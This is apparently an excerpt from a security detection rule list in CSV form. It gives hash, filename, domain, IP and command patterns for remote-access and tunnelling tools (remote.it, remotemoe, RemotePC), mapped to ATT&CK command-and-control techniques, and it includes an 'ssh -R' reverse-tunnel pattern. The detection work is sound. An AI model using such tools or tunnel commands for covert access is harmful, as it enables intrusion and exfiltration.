"*eb60b71cf30ee2975270b48a31c4e2d1812e61bbfb4f5c3bd512b578782e7b3f*",".{0,1000}eb60b71cf30ee2975270b48a31c4e2d1812e61bbfb4f5c3bd512b578782e7b3f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*ebae9cb602d9475764d0abb184a85747dc86c0a2c683357f9bfafbadce743030*",".{0,1000}ebae9cb602d9475764d0abb184a85747dc86c0a2c683357f9bfafbadce743030.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*ec3af0d72abfdc79b417640ec6d170e079f6ebf4917f0a317aa441a64851d85c*",".{0,1000}ec3af0d72abfdc79b417640ec6d170e079f6ebf4917f0a317aa441a64851d85c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*ee0917c3db2e6a92e681f9b3b7837165924df74e5ca5bb9c3f7de7f411c9512b*",".{0,1000}ee0917c3db2e6a92e681f9b3b7837165924df74e5ca5bb9c3f7de7f411c9512b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*eee0125ce7d147791c5b6df258e849476727218f04d1ebbd1a305e64b8e9e777*",".{0,1000}eee0125ce7d147791c5b6df258e849476727218f04d1ebbd1a305e64b8e9e777.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*f062d1f8866ffa374149c6c672e92947654876e80faa847b5fba3eb098b22d46*",".{0,1000}f062d1f8866ffa374149c6c672e92947654876e80faa847b5fba3eb098b22d46.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*f1f11c0e9dc81dbb5d52bfd190ad7487c124c20c248ee224d8163ec9d703a096*",".{0,1000}f1f11c0e9dc81dbb5d52bfd190ad7487c124c20c248ee224d8163ec9d703a096.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*f309dc9fddef92be50048234dab7ef0fbb0af6aae0567ae60459a8a35e8d36f6*",".{0,1000}f309dc9fddef92be50048234dab7ef0fbb0af6aae0567ae60459a8a35e8d36f6.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*f410d7494e1e07669dcd4bb02b08f5b79720f7b11522e7dac064d2336800fb00*",".{0,1000}f410d7494e1e07669dcd4bb02b08f5b79720f7b11522e7dac064d2336800fb00.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*f48343180d92f8780323d45addd6ddfae8d496fa31b1c9abebd8e543db544443*",".{0,1000}f48343180d92f8780323d45addd6ddfae8d496fa31b1c9abebd8e543db544443.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*f4c231ebe0140f82fe4b1528171c9fe0cb754ed803729681e2187adc68d9accb*",".{0,1000}f4c231ebe0140f82fe4b1528171c9fe0cb754ed803729681e2187adc68d9accb.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*f52084516dff0a54b9cb0d8c8ab961db1154ceb43261257e7ea4e57cef4c1991*",".{0,1000}f52084516dff0a54b9cb0d8c8ab961db1154ceb43261257e7ea4e57cef4c1991.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*f53253575b70dfd206586899b6de357f5288ddfae0e4bbc54f7804f01719cb76*",".{0,1000}f53253575b70dfd206586899b6de357f5288ddfae0e4bbc54f7804f01719cb76.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*f5e53a8f6aa666cbbe9c0a0bebd9e0f1315e7e9f9348cb4a341602c14b2943f9*",".{0,1000}f5e53a8f6aa666cbbe9c0a0bebd9e0f1315e7e9f9348cb4a341602c14b2943f9.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*f6363909101b64b4aeea40fcd365e4d71e70a5f01bf980670309a5650bbd9254*",".{0,1000}f6363909101b64b4aeea40fcd365e4d71e70a5f01bf980670309a5650bbd9254.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*f6b7b1c1dcdd6609fdee89557038818bae31850094b18614529e080383b8c5f4*",".{0,1000}f6b7b1c1dcdd6609fdee89557038818bae31850094b18614529e080383b8c5f4.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*f84ef28bd00757a3e609bddd4e1267d8d0adbc25d3014bf291f3924139900c65*",".{0,1000}f84ef28bd00757a3e609bddd4e1267d8d0adbc25d3014bf291f3924139900c65.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*f8d92121ac270672a940549d33b12b35414ddc844de5a56874b567bccd607b94*",".{0,1000}f8d92121ac270672a940549d33b12b35414ddc844de5a56874b567bccd607b94.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*f8fab0f7fdafeea49e8d33a69185144d1116fe95ec89ce8b0ae7ad7cab21c70e*",".{0,1000}f8fab0f7fdafeea49e8d33a69185144d1116fe95ec89ce8b0ae7ad7cab21c70e.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*f905a60a79e8e34f9a747703c5a34aacd35ef8fe07cef2dd4caf2f2f332f419e*",".{0,1000}f905a60a79e8e34f9a747703c5a34aacd35ef8fe07cef2dd4caf2f2f332f419e.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*f9f02edbb1ce8805f22db9c97cf582d93bffe67fd4fbdddd67ebef132a8f46e8*",".{0,1000}f9f02edbb1ce8805f22db9c97cf582d93bffe67fd4fbdddd67ebef132a8f46e8.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*fb5f40bd41ffd98ff11efcc9afe2f431699c372b8806df096d7270cd5eae06a5*",".{0,1000}fb5f40bd41ffd98ff11efcc9afe2f431699c372b8806df096d7270cd5eae06a5.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*fc80434203f482e80c4dd8f509a5ad4dae149a62399366b45b285ba4577e7cb7*",".{0,1000}fc80434203f482e80c4dd8f509a5ad4dae149a62399366b45b285ba4577e7cb7.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*fcb77da2f09a0fef3c5c97c9aeec535a92977beab31fe315cdc5fd855f964fcd*",".{0,1000}fcb77da2f09a0fef3c5c97c9aeec535a92977beab31fe315cdc5fd855f964fcd.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","#filehash","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*fde10089445a9891714b268d69ec4de5b5457ed084fe091cdadb23c9b432c271*",".{0,1000}fde10089445a9891714b268d69ec4de5b5457ed084fe091cdadb23c9b432c271.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*fefb2b5bc41354345598c2f69090bf16f7f1add348fa6a4bad60dd8fb0e73d40*",".{0,1000}fefb2b5bc41354345598c2f69090bf16f7f1add348fa6a4bad60dd8fb0e73d40.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*https://link.remote.it/support/rpi-linux-quick-install*",".{0,1000}https\:\/\/link\.remote\.it\/support\/rpi\-linux\-quick\-install.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","1","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*Please wait while we stop the Remote.It system service*",".{0,1000}Please\swait\swhile\swe\sstop\sthe\sRemote\.It\ssystem\sservice.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*Program Files\remoteit-bin*",".{0,1000}Program\sFiles\\remoteit\-bin.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*remot3.it, Inc*",".{0,1000}remot3\.it,\sInc.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*remote.it.developertoolsHW9iHnd*",".{0,1000}remote\.it\.developertoolsHW9iHnd.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*remoteit/installer*",".{0,1000}remoteit\/installer.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","1","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*remoteit/remoteit-agent*",".{0,1000}remoteit\/remoteit\-agent.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","1","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*remoteit-amd64-installer.deb*",".{0,1000}remoteit\-amd64\-installer\.deb.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*remoteit-installer.exe*",".{0,1000}remoteit\-installer\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*systemctl enable connectd*",".{0,1000}systemctl\senable\sconnectd.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*systemctl start connectd_schannel*",".{0,1000}systemctl\sstart\sconnectd_schannel.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*systemctl stop connectd_schannel*",".{0,1000}systemctl\sstop\sconnectd_schannel.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"* ssh -R* remote.moe*",".{0,1000}\sssh\s\-R.{0,1000}\sremote\.moe.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z"
"*.config/systemd/user/remotemoe.service*",".{0,1000}\.config\/systemd\/user\/remotemoe\.service.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z"
"*/remotemoe.git*",".{0,1000}\/remotemoe\.git.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","1","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z"
"*159.69.126.209*",".{0,1000}159\.69\.126\.209.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","1","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z"
"*69bc5a68959f7b47ac43810dbe782723eca56101d4bb60533a78530ac1ba23b1*",".{0,1000}69bc5a68959f7b47ac43810dbe782723eca56101d4bb60533a78530ac1ba23b1.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","#filehash","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z"
"*7k3j6g3h67l23j345wennkoc4a2223rhjkba22o77ihzdj3achwa.remote.moe*",".{0,1000}7k3j6g3h67l23j345wennkoc4a2223rhjkba22o77ihzdj3achwa\.remote\.moe.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","1","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z"
"*92c70b09d49bef20ae730c579e125f4f7c66d85ef2249c77694f0066a3156b26*",".{0,1000}92c70b09d49bef20ae730c579e125f4f7c66d85ef2249c77694f0066a3156b26.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","#filehash","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z"
"*df1b9ddfb57a7fa9b93b250a689e392171764364ff929a701e7a2df763904b78*",".{0,1000}df1b9ddfb57a7fa9b93b250a689e392171764364ff929a701e7a2df763904b78.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","#filehash","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z"
"*dummy.remote.moe*",".{0,1000}dummy\.remote\.moe.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z"
"*fasmide/remotemoe*",".{0,1000}fasmide\/remotemoe.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","1","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z"
"*http://*.remote.moe/*",".{0,1000}http\:\/\/.{0,1000}\.remote\.moe\/.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","1","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z"
"*https://*.remote.moe/*",".{0,1000}https\:\/\/.{0,1000}\.remote\.moe\/.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","1","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z"
"*infrastructure/remotemoe.service*",".{0,1000}infrastructure\/remotemoe\.service.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","1","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z"
"*systemctl restart remotemoe*",".{0,1000}systemctl\srestart\sremotemoe.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z"
"*systemctl start remotemoe*",".{0,1000}systemctl\sstart\sremotemoe.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z"
"*systemctl status remotemoe*",".{0,1000}systemctl\sstatus\sremotemoe.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z"
"*systemctl stop remotemoe*",".{0,1000}systemctl\sstop\sremotemoe.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z"
"*systemctl --user start remotemoe.service*",".{0,1000}systemctl\s\-\-user\sstart\sremotemoe\.service.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z"
"* /f /im RemotePCS*",".{0,1000}\s\/f\s\/im\sRemotePCS.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* create RPCService start=*",".{0,1000}\screate\sRPCService\sstart\=.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* create ViewerService start=auto*",".{0,1000}\screate\sViewerService\sstart\=auto.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* -i remotepc.deb*",".{0,1000}\s\-i\sremotepc\.deb.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* RemotePC.exe*",".{0,1000}\sRemotePC\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* RemotePCAttendedService *",".{0,1000}\sRemotePCAttendedService\s.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* remotepclauncher.exe*",".{0,1000}\sremotepclauncher\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* remotepcuiu.exe*",".{0,1000}\sremotepcuiu\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* RemotePCViewer.msi*",".{0,1000}\sRemotePCViewer\.msi.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* rpcdownloader.exe*",".{0,1000}\srpcdownloader\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* rpcperfviewer.exe*",".{0,1000}\srpcperfviewer\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* RPCWinXP.exe*",".{0,1000}\sRPCWinXP\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*""RemotePCAttendedService""*",".{0,1000}\""RemotePCAttendedService\"".{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.remotepc.com*",".{0,1000}\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
